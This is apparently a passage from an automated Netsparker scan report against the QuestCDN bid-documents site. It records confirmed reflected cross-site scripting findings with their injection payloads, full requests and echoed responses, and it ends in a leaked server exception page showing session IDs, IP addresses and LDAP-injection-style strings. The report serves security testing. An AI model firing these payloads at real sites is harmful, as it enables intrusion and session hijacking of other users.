width="185"><a href="/qap/forgotPassword.html">Forgot Password?</a></td> </tr> </table><!-- <p>Not already a member of QuestCDN.com - click <a href="https://secure.questcdn.com/questcdn/subscribe/sub_form.html?root_page=true member_no="<?s:subscriberPK?>" jobCategoryNo="<?p:jobCategoryNo?>" jobNo="<?p:jobNo?>" provider="<?p:provider?>" ">JOIN</a> for your Free membership</p>--><!-- <p>Not already a member of QuestCDN.com - click <a href="https://qap.questcdn.com/qap/subscribe/sub_form.html?root_page=true download_type=plan jobCategoryNo=<?p:jobCategoryNo?> jobNo=<?p:jobNo?> member_no=<?s:subscriberPK?> provider=<?p:provider?>"<font color=red size=3 >JOIN</font></a> for your Free membership</p>--> <p>Not already a member of QuestCDN.com - click <a href="https://qap.questcdn.com/qap/subscribe/sub_form.html?root_page=true&download_type=plan&member_no=&jobCategoryNo=1048445&jobNo=1438657&provider=453856"><font color=red size=3 >JOIN</font></a> for your Free membership</p </td></tr></table></body></html>
Date: Tue, 01 Mar 2011 20:06:52 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:06:58 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 3675
Content-Type: text/html;charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Topeka - Projects</title><script type="text/javascript"><!-- function doDownload() { doLogin(); } function doLogin() { document.location = '/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=1048445&member_no=&provider=453856&jobNo=1438657&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); } function doPlanHolders() { //window.open('/qap/projects/prj_add_mod/prj_plan_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/planholder/planholder_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=1100,scrollbars,resizable'); } function confirmPlanDl() { document.location ='/qap/projects/prj_browse/prj_b_dlconf.html?member_no=&job_no=1438657&download_type=plan', '', 'height=300,width=500,scrollbars,resizable'; } function ShowProjectPreview(action) { window.open('/qap/action/showProjPreviewPage?JobPK=1438657&eca=showProjPreviewPage', '', 'height=600,width=700,scrollbars,resizable'); }// --></script></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td width="100%" height="100%" valign="top"> <div class="crumbtrail"><a href="/ipp/'"--></style></script><script>netsparker(0x00026B)</script>?3"><span class="arrow"><--</span>Return to last page</a></div> <form name="userdata" Action="/qap/action/ippLogin" Method="POST"> <input type="hidden" name="root_page" value="true"> <input type="hidden" name="provider" value="453856"> <input type="hidden" name="jobCategoryNo" value="1048445"> <input type="hidden" name="jobNo" value="1438657"> <input type="hidden" name="loginPagePath" value="'"--></style></script><script>netsparker(0x00026B)</script>"> <input type="hidden" name="loginPageParams" value="3"> <h3>Login</h3> <p>Please use your QuestCDN.com Username & Password to log in:</p> <table width="300"> <tr> <td width="150">username:</td> <td width="150"><input type="text" name="username" size="24"></td> </tr> <tr> <td width="150">password:</td> <td width="150"><input type="password" name="password" size="24"></td> </tr> <tr> <td> </td> <td><input type="submit" value="Login"</input></td> </tr> <tr> <td width="115"></td> <td width="185"><a href="/qap/forgotPassword.html">Forgot Password?</a></td> </tr> </table><!-- <p>Not already a member of QuestCDN.com - click <a href="https://secure.questcdn.com/questcdn/subscribe/sub_form.html?root_page=true member_no="<?s:subscriberPK?>" jobCategoryNo="<?p:jobCategoryNo?>" jobNo="<?p:jobNo?>" provider="<?p:provider?>" ">JOIN</a> for your Free membership</p>--><!-- <p>Not already a member of QuestCDN.com - click <a href="https://qap.questcdn.com/qap/subscribe/sub_form.html?root_page=true download_type=plan jobCategoryNo=<?p:jobCategoryNo?> jobNo=<?p:jobNo?> member_no=<?s:subscriberPK?> provider=<?p:provider?>"<font color=red size=3 >JOIN</font></a> for your Free membership</p>--> <p>Not already a member of QuestCDN.com - click <a href="https://qap.questcdn.com/qap/subscribe/sub_form.html?root_page=true&download_type=plan&member_no=&jobCategoryNo=1048445&jobNo=1438657&provider=453856"><font color=red size=3 >JOIN</font></a> for your Free membership</p </td></tr></table></body></html>
|
- /qap/projects/prj_browse/ipp_login.html
/qap/projects/prj_browse/ipp_login.html CONFIRMED |
Parameters
| Parameter | Type | Value |
| jobCategoryNo | GET | 1048445 |
| provider | GET | 453856 |
| jobNo | GET | 1438657 |
| caller | GET | projects/prj_browse/ipp_prj_browse_f.html |
| caller_params | GET | '"--></style></script><script>alert(0x00026E)</script> |
Request
GET /qap/projects/prj_browse/ipp_login.html?jobCategoryNo=1048445&provider=453856&jobNo=1438657&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00026E)%3C/script%3E HTTP/1.1
Referer: http://qap.questcdn.com/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:07:00 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:07:01 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 3755
Content-Type: text/html;charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Topeka - Projects</title><script type="text/javascript"><!-- function doDownload() { doLogin(); } function doLogin() { document.location = '/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=1048445&member_no=&provider=453856&jobNo=1438657&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); } function doPlanHolders() { //window.open('/qap/projects/prj_add_mod/prj_plan_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/planholder/planholder_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=1100,scrollbars,resizable'); } function confirmPlanDl() { document.location ='/qap/projects/prj_browse/prj_b_dlconf.html?member_no=&job_no=1438657&download_type=plan', '', 'height=300,width=500,scrollbars,resizable'; } function ShowProjectPreview(action) { window.open('/qap/action/showProjPreviewPage?JobPK=1438657&eca=showProjPreviewPage', '', 'height=600,width=700,scrollbars,resizable'); }// --></script></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td width="100%" height="100%" valign="top"> <div class="crumbtrail"><a href="/ipp/projects/prj_browse/ipp_prj_browse_f.html?'"--></style></script><script>netsparker(0x00026E)</script>"><span class="arrow"><--</span>Return to last page</a></div> <form name="userdata" Action="/qap/action/ippLogin" Method="POST"> <input type="hidden" name="root_page" value="true"> <input type="hidden" name="provider" value="453856"> <input type="hidden" name="jobCategoryNo" value="1048445"> <input type="hidden" name="jobNo" value="1438657"> <input type="hidden" name="loginPagePath" value="projects/prj_browse/ipp_prj_browse_f.html"> <input type="hidden" name="loginPageParams" value="'"--></style></script><script>netsparker(0x00026E)</script>"> <h3>Login</h3> <p>Please use your QuestCDN.com Username & Password to log in:</p> <table width="300"> <tr> <td width="150">username:</td> <td width="150"><input type="text" name="username" size="24"></td> </tr> <tr> <td width="150">password:</td> <td width="150"><input type="password" name="password" size="24"></td> </tr> <tr> <td> </td> <td><input type="submit" value="Login"</input></td> </tr> <tr> <td width="115"></td> <td width="185"><a href="/qap/forgotPassword.html">Forgot Password?</a></td> </tr> </table><!-- <p>Not already a member of QuestCDN.com - click <a href="https://secure.questcdn.com/questcdn/subscribe/sub_form.html?root_page=true member_no="<?s:subscriberPK?>" jobCategoryNo="<?p:jobCategoryNo?>" jobNo="<?p:jobNo?>" provider="<?p:provider?>" ">JOIN</a> for your Free membership</p>--><!-- <p>Not already a member of QuestCDN.com - click <a href="https://qap.questcdn.com/qap/subscribe/sub_form.html?root_page=true download_type=plan jobCategoryNo=<?p:jobCategoryNo?> jobNo=<?p:jobNo?> member_no=<?s:subscriberPK?> provider=<?p:provider?>"<font color=red size=3 >JOIN</font></a> for your Free membership</p>--> <p>Not already a member of QuestCDN.com - click <a href="https://qap.questcdn.com/qap/subscribe/sub_form.html?root_page=true&download_type=plan&member_no=&jobCategoryNo=1048445&jobNo=1438657&provider=453856"><font color=red size=3 >JOIN</font></a> for your Free membership</p </td></tr></table></body></html>
Date: Tue, 01 Mar 2011 20:07:00 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:07:01 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 3755
Content-Type: text/html;charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Topeka - Projects</title><script type="text/javascript"><!-- function doDownload() { doLogin(); } function doLogin() { document.location = '/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=1048445&member_no=&provider=453856&jobNo=1438657&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); } function doPlanHolders() { //window.open('/qap/projects/prj_add_mod/prj_plan_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/planholder/planholder_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=1100,scrollbars,resizable'); } function confirmPlanDl() { document.location ='/qap/projects/prj_browse/prj_b_dlconf.html?member_no=&job_no=1438657&download_type=plan', '', 'height=300,width=500,scrollbars,resizable'; } function ShowProjectPreview(action) { window.open('/qap/action/showProjPreviewPage?JobPK=1438657&eca=showProjPreviewPage', '', 'height=600,width=700,scrollbars,resizable'); }// --></script></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td width="100%" height="100%" valign="top"> <div class="crumbtrail"><a href="/ipp/projects/prj_browse/ipp_prj_browse_f.html?'"--></style></script><script>netsparker(0x00026E)</script>"><span class="arrow"><--</span>Return to last page</a></div> <form name="userdata" Action="/qap/action/ippLogin" Method="POST"> <input type="hidden" name="root_page" value="true"> <input type="hidden" name="provider" value="453856"> <input type="hidden" name="jobCategoryNo" value="1048445"> <input type="hidden" name="jobNo" value="1438657"> <input type="hidden" name="loginPagePath" value="projects/prj_browse/ipp_prj_browse_f.html"> <input type="hidden" name="loginPageParams" value="'"--></style></script><script>netsparker(0x00026E)</script>"> <h3>Login</h3> <p>Please use your QuestCDN.com Username & Password to log in:</p> <table width="300"> <tr> <td width="150">username:</td> <td width="150"><input type="text" name="username" size="24"></td> </tr> <tr> <td width="150">password:</td> <td width="150"><input type="password" name="password" size="24"></td> </tr> <tr> <td> </td> <td><input type="submit" value="Login"</input></td> </tr> <tr> <td width="115"></td> <td width="185"><a href="/qap/forgotPassword.html">Forgot Password?</a></td> </tr> </table><!-- <p>Not already a member of QuestCDN.com - click <a href="https://secure.questcdn.com/questcdn/subscribe/sub_form.html?root_page=true member_no="<?s:subscriberPK?>" jobCategoryNo="<?p:jobCategoryNo?>" jobNo="<?p:jobNo?>" provider="<?p:provider?>" ">JOIN</a> for your Free membership</p>--><!-- <p>Not already a member of QuestCDN.com - click <a href="https://qap.questcdn.com/qap/subscribe/sub_form.html?root_page=true download_type=plan jobCategoryNo=<?p:jobCategoryNo?> jobNo=<?p:jobNo?> member_no=<?s:subscriberPK?> provider=<?p:provider?>"<font color=red size=3 >JOIN</font></a> for your Free membership</p>--> <p>Not already a member of QuestCDN.com - click <a href="https://qap.questcdn.com/qap/subscribe/sub_form.html?root_page=true&download_type=plan&member_no=&jobCategoryNo=1048445&jobNo=1438657&provider=453856"><font color=red size=3 >JOIN</font></a> for your Free membership</p </td></tr></table></body></html>
|
- /qap/projects/prj_browse/ipp_addenda_login.html
/qap/projects/prj_browse/ipp_addenda_login.html CONFIRMED |
Parameters
| Parameter | Type | Value |
| jobCategoryNo | GET | '"--></style></script><script>alert(0x00026C)</script> |
| calling_function | GET | ?calling_function |
| provider | GET | 453856 |
| jobNo | GET | 1438657 |
Request
GET /qap/projects/prj_browse/ipp_addenda_login.html?jobCategoryNo='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00026C)%3C/script%3E&calling_function=%3Fcalling_function&provider=453856&jobNo=1438657 HTTP/1.1
Referer: http://qap.questcdn.com/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:06:55 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:07:00 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 3511
Content-Type: text/html;charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Topeka - Projects</title><script type="text/javascript"><!-- function doDownload() { doLogin(); } function doLogin() { document.location = '/qap/projects/prj_browse/ipp_addenda_login.html?jobCategoryNo=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x00026C%29%3C%2Fscript%3E&provider=453856&jobNo=1438657&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); } function doPlanHolders() { //window.open('/qap/projects/prj_add_mod/prj_plan_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/planholder/planholder_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=1100,scrollbars,resizable'); } function confirmPlanDl() { document.location = '/qap/projects/prj_browse/prj_addenda_list.html?jobNo=1438657', '', 'height=650,width=650,scrollbars,resizable'; } function ShowProjectPreview(action) { window.open('/qap/action/showProjPreviewPage?JobPK=1438657&eca=showProjPreviewPage', '', 'height=600,width=700,scrollbars,resizable'); }// --></script></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td width="100%" height="100%" valign="top"> <form name="userdata" Action="/qap/action/ippAddendaLogin" Method="POST"> <input type="hidden" name="root_page" value="true"> <input type="hidden" name="provider" value="453856"> <input type="hidden" name="jobCategoryNo" value="'"--></style></script><script>netsparker(0x00026C)</script>"> <input type="hidden" name="jobNo" value="1438657"> <input type="hidden" name="loginPagePath" value="index.html"> <input type="hidden" name="loginPageParams" value=""> <h3>Login</h3> <p>Please use your QuestCDN.com Username & Password to log in:</p> <table width="300"> <tr> <td width="150">username:</td> <td width="150"><input type="text" name="username" size="24"></td> </tr> <tr> <td width="150">password:</td> <td width="150"><input type="password" name="password" size="24"></td> </tr> <tr> <td> </td> <td><input type="submit" value="Login"</input></td> </tr> <tr> <td width="115"></td> <td width="185"><a href="/qap/forgotPassword.html">Forgot Password?</a></td> </tr> </table><!-- <p>Not already a member of QuestCDN.com - click <a href="https://secure.questcdn.com/questcdn/subscribe/sub_form.html?root_page=true jobCategoryNo="<?p:jobCategoryNo?>" jobNo="<?p:jobNo?>" provider="<?p:provider?>" ">JOIN</a> for your Free membership</p>--><!-- <p>Not already a member of QuestCDN.com - click <a href="https://ipp.questcdn/ipp/subscribe/sub_form.html?root_page=true jobCategoryNo=<?p:jobCategoryNo?> jobNo=<?p:jobNo?> provider=<?p:provider?>">JOIN</a> for your Free membership</p>--> <p>Not already a member of QuestCDN.com - click <a href="/qap/subscribe/sub_form.html?jobCategoryNo=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x00026C%29%3C%2Fscript%3E&download_type=addenda&root_page=true&provider=453856&jobNo=1438657"><font color=red size=3 >JOIN</font></a> for your Free membership</p> </td></tr></table></body></html>
Date: Tue, 01 Mar 2011 20:06:55 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:07:00 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 3511
Content-Type: text/html;charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Topeka - Projects</title><script type="text/javascript"><!-- function doDownload() { doLogin(); } function doLogin() { document.location = '/qap/projects/prj_browse/ipp_addenda_login.html?jobCategoryNo=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x00026C%29%3C%2Fscript%3E&provider=453856&jobNo=1438657&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); } function doPlanHolders() { //window.open('/qap/projects/prj_add_mod/prj_plan_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/planholder/planholder_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=1100,scrollbars,resizable'); } function confirmPlanDl() { document.location = '/qap/projects/prj_browse/prj_addenda_list.html?jobNo=1438657', '', 'height=650,width=650,scrollbars,resizable'; } function ShowProjectPreview(action) { window.open('/qap/action/showProjPreviewPage?JobPK=1438657&eca=showProjPreviewPage', '', 'height=600,width=700,scrollbars,resizable'); }// --></script></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td width="100%" height="100%" valign="top"> <form name="userdata" Action="/qap/action/ippAddendaLogin" Method="POST"> <input type="hidden" name="root_page" value="true"> <input type="hidden" name="provider" value="453856"> <input type="hidden" name="jobCategoryNo" value="'"--></style></script><script>netsparker(0x00026C)</script>"> <input type="hidden" name="jobNo" value="1438657"> <input type="hidden" name="loginPagePath" value="index.html"> <input type="hidden" name="loginPageParams" value=""> <h3>Login</h3> <p>Please use your QuestCDN.com Username & Password to log in:</p> <table width="300"> <tr> <td width="150">username:</td> <td width="150"><input type="text" name="username" size="24"></td> </tr> <tr> <td width="150">password:</td> <td width="150"><input type="password" name="password" size="24"></td> </tr> <tr> <td> </td> <td><input type="submit" value="Login"</input></td> </tr> <tr> <td width="115"></td> <td width="185"><a href="/qap/forgotPassword.html">Forgot Password?</a></td> </tr> </table><!-- <p>Not already a member of QuestCDN.com - click <a href="https://secure.questcdn.com/questcdn/subscribe/sub_form.html?root_page=true jobCategoryNo="<?p:jobCategoryNo?>" jobNo="<?p:jobNo?>" provider="<?p:provider?>" ">JOIN</a> for your Free membership</p>--><!-- <p>Not already a member of QuestCDN.com - click <a href="https://ipp.questcdn/ipp/subscribe/sub_form.html?root_page=true jobCategoryNo=<?p:jobCategoryNo?> jobNo=<?p:jobNo?> provider=<?p:provider?>">JOIN</a> for your Free membership</p>--> <p>Not already a member of QuestCDN.com - click <a href="/qap/subscribe/sub_form.html?jobCategoryNo=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x00026C%29%3C%2Fscript%3E&download_type=addenda&root_page=true&provider=453856&jobNo=1438657"><font color=red size=3 >JOIN</font></a> for your Free membership</p> </td></tr></table></body></html>
|
- /qap/action/IPPshowProjData
/qap/action/IPPshowProjData |
Parameters
| Parameter | Type | Value |
| jobCategoryNo | GET | 324403 |
| group | GET | 11 |
| provider | GET | 453856 |
| sortType | GET | 0 |
| jobNo | GET | 1464405 |
| Query Based | QUERYSTRING | '"--></style></script><script>alert(0x0001A4)</script> |
Request
GET /qap/action/IPPshowProjData?'"--></style></script><script>netsparker(0x0001A4)</script> HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:03:12 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:03:12 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 15218220
Content-Type: text/html;charset=utf-8
<html><head><title>Exception in IPPShowProjData.handleEnvironment()</title><script language="JavaScript"><!--//function prepare() { document.form1.title.value = document.title; document.form1.location.value = document.location; document.form1.referrer.value = document.referrer; document.form1.platform.value = navigator.appName + " " + navigator.appVersion; document.form1.message.value = document.all.details.innerText; document.form1.comments.select();}//--></script></head><body onload="prepare()"><font face="verdana,arial,helvetica,sans-serif"><hr><div align="center"><font face="verdana" size="+2"><b>Exception in IPPShowProjData.handleEnvironment()</b></font></div><hr><script language="JavaScript"><!--//document.write('Location: <font color="#FF0000">' + document.location + '</font><br>');document.write('Referrer: <font color="#FF0000">' + document.referrer + '</font><br>');document.write('Platform: <font color="#FF0000">' + navigator.appName + ' ' + navigator.appVersion + '</font><br>');//--></script></font><form name="form1" method="post" action="mailto:support@open-techsys.com?SUBJECT=Exception in IPPShowProjData.handleEnvironment()" enctype="text/plain"> <input class="button" type="button" value="Back" onclick="history.back(); return true"> <input class="button" type="button" value="Details" onclick="if (this.value == 'Details') { document.all.details.style.display=''; this.value='Hide' } else { document.all.details.style.display='none'; this.value='Details' } return true"> <div id="details" style="display:none"> <br> <font color="#FF0000">2011/03/01 14:03:12.969 [ 1] (TP-Processor1804) Exception in IPPShowProjData.handleEnvironment() from 173.193.214.243 using Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) while processing URL http://qap.questcdn.com/qap/action/IPPshowProjData?'"--></style></script><script>netsparker(0x0001A4)</script><pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/lang/NullPointerException.html" target="new">java.lang.NullPointerException</a>: null at com.questcdn.projects.IPPShowProjData.handleEnvironment(IPPShowProjData.java:111) at dynamic.intraframe.handlers.BaseHandler.handle(BaseHandler.java:29) at dynamic.intraframe.handlers.Dispatcher.dispatchAction(Dispatcher.java:143) at dynamic.intraframe.engine.BaseInvocationContext.dispatchAction(BaseInvocationContext.java:1194) at dynamic.intraframe.engine.BaseApplicationContext.handleAction(BaseApplicationContext.java:934) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:843) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font><br> <br> <table width="600" border="0" cellpadding="0" cellspacing="1"> <tr><td bgcolor="#8888CC"><h3>URL</td></tr> <tr><td>http://qap.questcdn.com/qap/action/IPPshowProjData</td></tr> <tr><td> </td></tr> <tr><td bgcolor="#8888CC"><h3>Transient Data</td></tr> <tr><td><table width="100%"><tr><td bgcolor="#888888"><font size="2"><b>Key</b></font></td><td bgcolor="#888888"><font size="2"><b>Type</b></font></td><td bgcolor="#888888"><font size="2"><b>Value</b></font></td></tr></table></td></tr> <tr><td> </td></tr> <tr><td bgcolor="#8888CC"><h3>Parameter Data</td></tr> <tr><td><table width="100%"><tr><td bgcolor="#888888"><font size="2"><b>Key</b></font></td><td bgcolor="#888888"><font size="2"><b>Type</b></font></td><td bgcolor="#888888"><font size="2"><b>Value</b></font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1">'"--></style></script><script>netsparker(0x0001A4)</script></font></td><td bgcolor="#DCDCDC"><font size="1">java.lang.String</font></td><td bgcolor="#DCDCDC"><font size="1"></font></td></tr></table></td></tr> <tr><td> </td></tr> <tr><td bgcolor="#8888CC"><h3>Session Data</td></tr> <tr><td><b>SessionManager:</b> dynamic.intraframe.session.BaseSessionManager<br><b>Active Session Count:</b> 27260<br><b>Current Session ID:</b> <a href="?function=sessions&session=/177428174825690686">/177428174825690686</a><br><table width="100%"><tr><td bgcolor="#8888CC"><font size="2"><b>ID</b></font></td><td bgcolor="#8888CC"><font size="2"><b>IP Address</b></font></td><td bgcolor="#8888CC"><font size="2"><b>Created</b></font></td><td bgcolor="#8888CC"><font size="2"><b>Accessed</b></font></td><td bgcolor="#8888CC"><font size="2"><b>Expires</b></font></td><td bgcolor="#8888CC"><font size="2"><b>User Agent</b></font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=*)!(sn=*">*)!(sn=*</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">173.193.214.243</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:01 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:03 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:03 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=*)(sn=*">*)(sn=*</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">173.193.214.243</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:01 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:03 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:03 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/100032182287396464">/100032182287396464</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">87.248.122.142</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 25 10:47 AM</font></td><td bgcolor="#DCDCDC" 